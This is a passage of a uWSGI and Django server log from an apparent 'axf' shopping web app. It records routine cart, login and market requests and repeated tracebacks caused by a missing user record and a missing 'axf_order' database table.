[pid: 26361|app: 0|req: 10/10] 113.87.160.176 () {44 vars in 850 bytes} [Wed Mar 13 11:49:18 2019] GET /axf/cart/ => generated 942 bytes in 5 msecs (HTTP/1.1 200) 4 headers in 123 bytes (1 switches on core 1)
[pid: 26361|app: 0|req: 11/11] 113.87.160.176 () {44 vars in 852 bytes} [Wed Mar 13 11:49:19 2019] GET /axf/login/ => generated 1906 bytes in 5 msecs (HTTP/1.1 200) 5 headers in 278 bytes (1 switches on core 0)
[pid: 26361|app: 0|req: 12/12] 113.87.160.176 () {44 vars in 851 bytes} [Wed Mar 13 11:49:21 2019] GET /axf/mine/ => generated 5013 bytes in 6 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 1)
[pid: 26361|app: 0|req: 13/13] 113.87.160.176 () {44 vars in 854 bytes} [Wed Mar 13 11:49:22 2019] GET /axf/market/ => generated 10768 bytes in 13 msecs (HTTP/1.1 200) 4 headers in 125 bytes (1 switches on core 0)
[pid: 26361|app: 0|req: 14/14] 113.87.160.176 () {44 vars in 852 bytes} [Wed Mar 13 11:49:23 2019] GET /axf/cart/ => generated 942 bytes in 3 msecs (HTTP/1.1 200) 4 headers in 123 bytes (1 switches on core 1)
[pid: 26361|app: 0|req: 15/15] 113.87.160.176 () {44 vars in 852 bytes} [Wed Mar 13 11:49:24 2019] GET /axf/login/ => generated 1906 bytes in 4 msecs (HTTP/1.1 200) 5 headers in 278 bytes (1 switches on core 0)
[pid: 26361|app: 0|req: 16/16] 113.87.160.176 () {44 vars in 851 bytes} [Wed Mar 13 11:49:26 2019] GET /axf/mine/ => generated 5013 bytes in 6 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 1)
Internal Server Error: /axf/orderlist/
Traceback (most recent call last):
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/exception.py", line 41, in inner
    response = get_response(request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 187, in _get_response
    response = self.process_exception_by_middleware(e, request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 185, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
  File "./app/views.py", line 357, in orderlist
    user = User.objects.get(pk=userid)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/manager.py", line 85, in manager_method
    return getattr(self.get_queryset(), name)(*args, **kwargs)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/query.py", line 380, in get
    self.model._meta.object_name
app.models.DoesNotExist: User matching query does not exist.
[pid: 26361|app: 0|req: 17/17] 113.87.160.176 () {44 vars in 860 bytes} [Wed Mar 13 11:49:27 2019] GET /axf/orderlist/ => generated 68368 bytes in 47 msecs (HTTP/1.1 500) 4 headers in 129 bytes (1 switches on core 0)
Internal Server Error: /axf/orderlist/
Traceback (most recent call last):
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/exception.py", line 41, in inner
    response = get_response(request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 187, in _get_response
    response = self.process_exception_by_middleware(e, request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 185, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
  File "./app/views.py", line 357, in orderlist
    user = User.objects.get(pk=userid)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/manager.py", line 85, in manager_method
    return getattr(self.get_queryset(), name)(*args, **kwargs)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/query.py", line 380, in get
    self.model._meta.object_name
app.models.DoesNotExist: User matching query does not exist.
[pid: 26361|app: 0|req: 18/18] 113.87.160.176 () {46 vars in 891 bytes} [Wed Mar 13 11:49:40 2019] GET /axf/orderlist/ => generated 68503 bytes in 40 msecs (HTTP/1.1 500) 4 headers in 129 bytes (1 switches on core 1)
[pid: 26361|app: 0|req: 19/19] 113.87.160.176 () {44 vars in 852 bytes} [Wed Mar 13 11:49:49 2019] GET /axf/login/ => generated 1906 bytes in 5 msecs (HTTP/1.1 200) 5 headers in 278 bytes (1 switches on core 0)
123
[pid: 26361|app: 0|req: 20/20] 113.87.160.176 () {52 vars in 1037 bytes} [Wed Mar 13 11:49:55 2019] POST /axf/login/ => generated 0 bytes in 17 msecs (HTTP/1.1 302) 6 headers in 279 bytes (1 switches on core 1)
[pid: 26361|app: 0|req: 21/21] 113.87.160.176 () {46 vars in 930 bytes} [Wed Mar 13 11:49:55 2019] GET /axf/market/ => generated 12476 bytes in 31 msecs (HTTP/1.1 200) 4 headers in 125 bytes (1 switches on core 0)
[pid: 26361|app: 0|req: 22/22] 113.87.160.176 () {44 vars in 847 bytes} [Wed Mar 13 11:49:59 2019] GET /axf/addcart/?goodsid=983 => generated 74 bytes in 15 msecs (HTTP/1.1 200) 4 headers in 114 bytes (1 switches on core 1)
[pid: 26361|app: 0|req: 23/23] 113.87.160.176 () {44 vars in 847 bytes} [Wed Mar 13 11:50:00 2019] GET /axf/subcart/?goodsid=983 => generated 68 bytes in 16 msecs (HTTP/1.1 200) 4 headers in 114 bytes (1 switches on core 0)
[pid: 26361|app: 0|req: 24/24] 113.87.160.176 () {44 vars in 847 bytes} [Wed Mar 13 11:50:00 2019] GET /axf/subcart/?goodsid=983 => generated 68 bytes in 15 msecs (HTTP/1.1 200) 4 headers in 114 bytes (1 switches on core 1)
[pid: 26361|app: 0|req: 25/25] 113.87.160.176 () {44 vars in 847 bytes} [Wed Mar 13 11:50:01 2019] GET /axf/subcart/?goodsid=983 => generated 68 bytes in 19 msecs (HTTP/1.1 200) 4 headers in 114 bytes (1 switches on core 0)
[pid: 26361|app: 0|req: 26/26] 113.87.160.176 () {44 vars in 847 bytes} [Wed Mar 13 11:50:01 2019] GET /axf/subcart/?goodsid=983 => generated 68 bytes in 13 msecs (HTTP/1.1 200) 4 headers in 114 bytes (1 switches on core 1)
[pid: 26361|app: 0|req: 27/27] 113.87.160.176 () {44 vars in 847 bytes} [Wed Mar 13 11:50:01 2019] GET /axf/subcart/?goodsid=983 => generated 68 bytes in 27 msecs (HTTP/1.1 200) 4 headers in 114 bytes (1 switches on core 0)
[pid: 26361|app: 0|req: 28/28] 113.87.160.176 () {44 vars in 847 bytes} [Wed Mar 13 11:50:01 2019] GET /axf/subcart/?goodsid=983 => generated 68 bytes in 17 msecs (HTTP/1.1 200) 4 headers in 114 bytes (1 switches on core 1)
[pid: 26361|app: 0|req: 29/29] 113.87.160.176 () {44 vars in 847 bytes} [Wed Mar 13 11:50:01 2019] GET /axf/subcart/?goodsid=983 => generated 68 bytes in 22 msecs (HTTP/1.1 200) 4 headers in 114 bytes (1 switches on core 0)
[pid: 26361|app: 0|req: 30/30] 113.87.160.176 () {44 vars in 847 bytes} [Wed Mar 13 11:50:02 2019] GET /axf/subcart/?goodsid=983 => generated 67 bytes in 14 msecs (HTTP/1.1 200) 4 headers in 114 bytes (1 switches on core 1)
[pid: 26361|app: 0|req: 31/31] 113.87.160.176 () {44 vars in 847 bytes} [Wed Mar 13 11:50:02 2019] GET /axf/subcart/?goodsid=983 => generated 67 bytes in 15 msecs (HTTP/1.1 200) 4 headers in 114 bytes (1 switches on core 0)
[pid: 26361|app: 0|req: 32/32] 113.87.160.176 () {44 vars in 847 bytes} [Wed Mar 13 11:50:02 2019] GET /axf/subcart/?goodsid=983 => generated 67 bytes in 19 msecs (HTTP/1.1 200) 4 headers in 114 bytes (1 switches on core 1)
[pid: 26361|app: 0|req: 33/33] 113.87.160.176 () {44 vars in 847 bytes} [Wed Mar 13 11:50:02 2019] GET /axf/subcart/?goodsid=983 => generated 67 bytes in 13 msecs (HTTP/1.1 200) 4 headers in 114 bytes (1 switches on core 0)
[pid: 26361|app: 0|req: 34/34] 113.87.160.176 () {44 vars in 847 bytes} [Wed Mar 13 11:50:02 2019] GET /axf/subcart/?goodsid=983 => generated 67 bytes in 17 msecs (HTTP/1.1 200) 4 headers in 114 bytes (1 switches on core 1)
[pid: 26361|app: 0|req: 35/35] 113.87.160.176 () {44 vars in 847 bytes} [Wed Mar 13 11:50:02 2019] GET /axf/subcart/?goodsid=983 => generated 67 bytes in 14 msecs (HTTP/1.1 200) 4 headers in 114 bytes (1 switches on core 0)
[pid: 26361|app: 0|req: 36/36] 113.87.160.176 () {44 vars in 847 bytes} [Wed Mar 13 11:50:03 2019] GET /axf/addcart/?goodsid=984 => generated 73 bytes in 15 msecs (HTTP/1.1 200) 4 headers in 114 bytes (1 switches on core 1)
[pid: 26361|app: 0|req: 37/37] 113.87.160.176 () {44 vars in 847 bytes} [Wed Mar 13 11:50:04 2019] GET /axf/addcart/?goodsid=985 => generated 73 bytes in 14 msecs (HTTP/1.1 200) 4 headers in 114 bytes (1 switches on core 0)
[pid: 26361|app: 0|req: 38/38] 113.87.160.176 () {44 vars in 896 bytes} [Wed Mar 13 11:50:06 2019] GET /axf/cart/ => generated 8286 bytes in 24 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 1)
Internal Server Error: /axf/genenateorder/
Traceback (most recent call last):
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/backends/utils.py", line 65, in execute
    return self.cursor.execute(sql, params)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/backends/mysql/base.py", line 101, in execute
    return self.cursor.execute(query, args)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/cursors.py", line 170, in execute
    result = self._query(query)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/cursors.py", line 328, in _query
    conn.query(q)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/connections.py", line 517, in query
    self._affected_rows = self._read_query_result(unbuffered=unbuffered)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/connections.py", line 732, in _read_query_result
    result.read()
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/connections.py", line 1075, in read
    first_packet = self.connection._read_packet()
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/connections.py", line 684, in _read_packet
    packet.check_error()
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/protocol.py", line 220, in check_error
    err.raise_mysql_exception(self._data)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/err.py", line 109, in raise_mysql_exception
    raise errorclass(errno, errval)
pymysql.err.ProgrammingError: (1146, "Table 'axf.axf_order' doesn't exist")

The above exception was the direct cause of the following exception:

Traceback (most recent call last):
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/exception.py", line 41, in inner
    response = get_response(request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 187, in _get_response
    response = self.process_exception_by_middleware(e, request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 185, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
  File "./app/views.py", line 333, in genenateorder
    order.save()
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/base.py", line 807, in save
    force_update=force_update, update_fields=update_fields)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/base.py", line 837, in save_base
    updated = self._save_table(raw, cls, force_insert, force_update, using, update_fields)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/base.py", line 923, in _save_table
    result = self._do_insert(cls._base_manager, using, fields, update_pk, raw)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/base.py", line 962, in _do_insert
    using=using, raw=raw)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/manager.py", line 85, in manager_method
    return getattr(self.get_queryset(), name)(*args, **kwargs)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/query.py", line 1076, in _insert
    return query.get_compiler(using=using).execute_sql(return_id)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/sql/compiler.py", line 1107, in execute_sql
    cursor.execute(sql, params)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/backends/utils.py", line 80, in execute
    return super(CursorDebugWrapper, self).execute(sql, params)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/backends/utils.py", line 65, in execute
    return self.cursor.execute(sql, params)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/utils.py", line 94, in __exit__
    six.reraise(dj_exc_type, dj_exc_value, traceback)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/utils/six.py", line 685, in reraise
    raise value.with_traceback(tb)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/backends/utils.py", line 65, in execute
    return self.cursor.execute(sql, params)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/backends/mysql/base.py", line 101, in execute
    return self.cursor.execute(query, args)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/cursors.py", line 170, in execute
    result = self._query(query)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/cursors.py", line 328, in _query
    conn.query(q)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/connections.py", line 517, in query
    self._affected_rows = self._read_query_result(unbuffered=unbuffered)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/connections.py", line 732, in _read_query_result
    result.read()
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/connections.py", line 1075, in read
    first_packet = self.connection._read_packet()
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/connections.py", line 684, in _read_packet
    packet.check_error()
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/protocol.py", line 220, in check_error
    err.raise_mysql_exception(self._data)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/err.py", line 109, in raise_mysql_exception
    raise errorclass(errno, errval)
django.db.utils.ProgrammingError: (1146, "Table 'axf.axf_order' doesn't exist")
[pid: 26361|app: 0|req: 39/39] 113.87.160.176 () {44 vars in 912 bytes} [Wed Mar 13 11:50:09 2019] GET /axf/genenateorder/ => generated 198441 bytes in 192 msecs (HTTP/1.1 500) 4 headers in 130 bytes (1 switches on core 0)
Internal Server Error: /axf/genenateorder/
Traceback (most recent call last):
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/backends/utils.py", line 65, in execute
    return self.cursor.execute(sql, params)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/backends/mysql/base.py", line 101, in execute
    return self.cursor.execute(query, args)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/cursors.py", line 170, in execute
    result = self._query(query)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/cursors.py", line 328, in _query
    conn.query(q)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/connections.py", line 517, in query
    self._affected_rows = self._read_query_result(unbuffered=unbuffered)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/connections.py", line 732, in _read_query_result
    result.read()
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/connections.py", line 1075, in read
    first_packet = self.connection._read_packet()
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/connections.py", line 684, in _read_packet
    packet.check_error()
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/protocol.py", line 220, in check_error
    err.raise_mysql_exception(self._data)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/err.py", line 109, in raise_mysql_exception
    raise errorclass(errno, errval)
pymysql.err.ProgrammingError: (1146, "Table 'axf.axf_order' doesn't exist")

The above exception was the direct cause of the following exception:

Traceback (most recent call last):
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/exception.py", line 41, in inner
    response = get_response(request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 187, in _get_response
    response = self.process_exception_by_middleware(e, request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 185, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
  File "./app/views.py", line 333, in genenateorder
    order.save()
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/base.py", line 807, in save
    force_update=force_update, update_fields=update_fields)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/base.py", line 837, in save_base
    updated = self._save_table(raw, cls, force_insert, force_update, using, update_fields)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/base.py", line 923, in _save_table
    result = self._do_insert(cls._base_manager, using, fields, update_pk, raw)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/base.py", line 962, in _do_insert
    using=using, raw=raw)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/manager.py", line 85, in manager_method
    return getattr(self.get_queryset(), name)(*args, **kwargs)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/query.py", line 1076, in _insert
    return query.get_compiler(using=using).execute_sql(return_id)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/sql/compiler.py", line 1107, in execute_sql
    cursor.execute(sql, params)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/backends/utils.py", line 80, in execute
    return super(CursorDebugWrapper, self).execute(sql, params)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/backends/utils.py", line 65, in execute
    return self.cursor.execute(sql, params)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/utils.py", line 94, in __exit__
    six.reraise(dj_exc_type, dj_exc_value, traceback)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/utils/six.py", line 685, in reraise
    raise value.with_traceback(tb)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/backends/utils.py", line 65, in execute
    return self.cursor.execute(sql, params)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/backends/mysql/base.py", line 101, in execute
    return self.cursor.execute(query, args)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/cursors.py", line 170, in execute
    result = self._query(query)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/cursors.py", line 328, in _query
    conn.query(q)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/connections.py", line 517, in query
    self._affected_rows = self._read_query_result(unbuffered=unbuffered)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/connections.py", line 732, in _read_query_result
    result.read()
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/connections.py", line 1075, in read
    first_packet = self.connection._read_packet()
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/connections.py", line 684, in _read_packet
    packet.check_error()
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/protocol.py", line 220, in check_error
    err.raise_mysql_exception(self._data)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/err.py", line 109, in raise_mysql_exception
    raise errorclass(errno, errval)
django.db.utils.ProgrammingError: (1146, "Table 'axf.axf_order' doesn't exist")
[pid: 26361|app: 0|req: 40/40] 113.88.14.120 () {46 vars in 912 bytes} [Wed Mar 13 11:52:22 2019] GET /axf/genenateorder/ => generated 198564 bytes in 105 msecs (HTTP/1.1 500) 4 headers in 130 bytes (1 switches on core 1)
[pid: 26361|app: 0|req: 41/41] 113.88.14.120 () {46 vars in 896 bytes} [Wed Mar 13 11:52:24 2019] GET /axf/cart/ => generated 8286 bytes in 25 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 0)
[pid: 26361|app: 0|req: 42/42] 113.88.14.120 () {46 vars in 926 bytes} [Wed Mar 13 11:52:31 2019] GET /axf/cart/ => generated 8286 bytes in 24 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 1)
[pid: 26361|app: 0|req: 43/43] 113.88.14.120 () {44 vars in 883 bytes} [Wed Mar 13 11:52:33 2019] GET /axf/ => generated 22501 bytes in 18 msecs (HTTP/1.1 200) 5 headers in 179 bytes (1 switches on core 0)
[pid: 26361|app: 0|req: 44/44] 113.88.14.120 () {44 vars in 892 bytes} [Wed Mar 13 11:52:35 2019] GET /axf/market/ => generated 12475 bytes in 35 msecs (HTTP/1.1 200) 4 headers in 125 bytes (1 switches on core 1)
[pid: 26361|app: 0|req: 45/45] 113.88.14.120 () {44 vars in 895 bytes} [Wed Mar 13 11:52:36 2019] GET /axf/cart/ => generated 8286 bytes in 22 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 0)
Internal Server Error: /axf/genenateorder/
Traceback (most recent call last):
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/backends/utils.py", line 65, in execute
    return self.cursor.execute(sql, params)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/backends/mysql/base.py", line 101, in execute
    return self.cursor.execute(query, args)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/cursors.py", line 170, in execute
    result = self._query(query)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/cursors.py", line 328, in _query
    conn.query(q)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/connections.py", line 517, in query
    self._affected_rows = self._read_query_result(unbuffered=unbuffered)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/connections.py", line 732, in _read_query_result
    result.read()
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/connections.py", line 1075, in read
    first_packet = self.connection._read_packet()
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/connections.py", line 684, in _read_packet
    packet.check_error()
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/protocol.py", line 220, in check_error
    err.raise_mysql_exception(self._data)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/err.py", line 109, in raise_mysql_exception
    raise errorclass(errno, errval)
pymysql.err.ProgrammingError: (1146, "Table 'axf.axf_order' doesn't exist")

The above exception was the direct cause of the following exception:

Traceback (most recent call last):
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/exception.py", line 41, in inner
    response = get_response(request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 187, in _get_response
    response = self.process_exception_by_middleware(e, request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 185, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
  File "./app/views.py", line 333, in genenateorder
    order.save()
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/base.py", line 807, in save
    force_update=force_update, update_fields=update_fields)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/base.py", line 837, in save_base
    updated = self._save_table(raw, cls, force_insert, force_update, using, update_fields)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/base.py", line 923, in _save_table
    result = self._do_insert(cls._base_manager, using, fields, update_pk, raw)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/base.py", line 962, in _do_insert
    using=using, raw=raw)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/manager.py", line 85, in manager_method
    return getattr(self.get_queryset(), name)(*args, **kwargs)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/query.py", line 1076, in _insert
    return query.get_compiler(using=using).execute_sql(return_id)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/sql/compiler.py", line 1107, in execute_sql
    cursor.execute(sql, params)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/backends/utils.py", line 80, in execute
    return super(CursorDebugWrapper, self).execute(sql, params)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/backends/utils.py", line 65, in execute
    return self.cursor.execute(sql, params)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/utils.py", line 94, in __exit__
    six.reraise(dj_exc_type, dj_exc_value, traceback)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/utils/six.py", line 685, in reraise
    raise value.with_traceback(tb)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/backends/utils.py", line 65, in execute
    return self.cursor.execute(sql, params)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/backends/mysql/base.py", line 101, in execute
    return self.cursor.execute(query, args)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/cursors.py", line 170, in execute
    result = self._query(query)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/cursors.py", line 328, in _query
    conn.query(q)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/connections.py", line 517, in query
    self._affected_rows = self._read_query_result(unbuffered=unbuffered)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/connections.py", line 732, in _read_query_result
    result.read()
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/connections.py", line 1075, in read
    first_packet = self.connection._read_packet()
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/connections.py", line 684, in _read_packet
    packet.check_error()
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/protocol.py", line 220, in check_error
    err.raise_mysql_exception(self._data)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/err.py", line 109, in raise_mysql_exception
    raise errorclass(errno, errval)
django.db.utils.ProgrammingError: (1146, "Table 'axf.axf_order' doesn't exist")
[pid: 26361|app: 0|req: 46/46] 113.88.14.120 () {44 vars in 911 bytes} [Wed Mar 13 11:52:39 2019] GET /axf/genenateorder/ => generated 198444 bytes in 92 msecs (HTTP/1.1 500) 4 headers in 130 bytes (1 switches on core 1)
[pid: 26361|app: 0|req: 47/47] 113.88.14.120 () {40 vars in 688 bytes} [Wed Mar 13 11:53:01 2019] GET /axf => generated 0 bytes in 0 msecs (HTTP/1.1 301) 3 headers in 110 bytes (1 switches on core 0)
[pid: 26361|app: 0|req: 48/48] 113.88.14.120 () {40 vars in 690 bytes} [Wed Mar 13 11:53:01 2019] GET /axf/ => generated 22501 bytes in 2 msecs (HTTP/1.1 200) 5 headers in 179 bytes (1 switches on core 0)
[pid: 26361|app: 0|req: 49/49] 113.88.14.120 () {42 vars in 742 bytes} [Wed Mar 13 11:53:03 2019] GET /axf/mine/ => generated 5013 bytes in 6 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 1)
[pid: 26361|app: 0|req: 50/50] 113.88.14.120 () {42 vars in 749 bytes} [Wed Mar 13 11:53:06 2019] GET /axf/login/ => generated 1906 bytes in 4 msecs (HTTP/1.1 200) 5 headers in 278 bytes (1 switches on core 0)
123
[pid: 26361|app: 0|req: 51/51] 113.88.14.120 () {52 vars in 1023 bytes} [Wed Mar 13 11:53:12 2019] POST /axf/login/ => generated 0 bytes in 11 msecs (HTTP/1.1 302) 6 headers in 277 bytes (1 switches on core 1)
[pid: 26361|app: 0|req: 52/52] 113.88.14.120 () {46 vars in 912 bytes} [Wed Mar 13 11:53:12 2019] GET /axf/mine/ => generated 5079 bytes in 9 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 0)
[pid: 26361|app: 0|req: 53/53] 113.88.14.120 () {44 vars in 884 bytes} [Wed Mar 13 11:53:14 2019] GET /axf/market/ => generated 12475 bytes in 29 msecs (HTTP/1.1 200) 4 headers in 125 bytes (1 switches on core 1)
[pid: 26361|app: 0|req: 54/54] 113.88.14.120 () {44 vars in 882 bytes} [Wed Mar 13 11:53:15 2019] GET /axf/cart/ => generated 8286 bytes in 24 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 0)
Internal Server Error: /axf/genenateorder/
Traceback (most recent call last):
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/backends/utils.py", line 65, in execute
    return self.cursor.execute(sql, params)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/backends/mysql/base.py", line 101, in execute
    return self.cursor.execute(query, args)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/cursors.py", line 170, in execute
    result = self._query(query)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/cursors.py", line 328, in _query
    conn.query(q)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/connections.py", line 517, in query
    self._affected_rows = self._read_query_result(unbuffered=unbuffered)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/connections.py", line 732, in _read_query_result
    result.read()
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/connections.py", line 1075, in read
    first_packet = self.connection._read_packet()
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/connections.py", line 684, in _read_packet
    packet.check_error()
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/protocol.py", line 220, in check_error
    err.raise_mysql_exception(self._data)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/err.py", line 109, in raise_mysql_exception
    raise errorclass(errno, errval)
pymysql.err.ProgrammingError: (1146, "Table 'axf.axf_order' doesn't exist")

The above exception was the direct cause of the following exception:

Traceback (most recent call last):
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/exception.py", line 41, in inner
    response = get_response(request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 187, in _get_response
    response = self.process_exception_by_middleware(e, request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 185, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
  File "./app/views.py", line 333, in genenateorder
    order.save()
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/base.py", line 807, in save
    force_update=force_update, update_fields=update_fields)
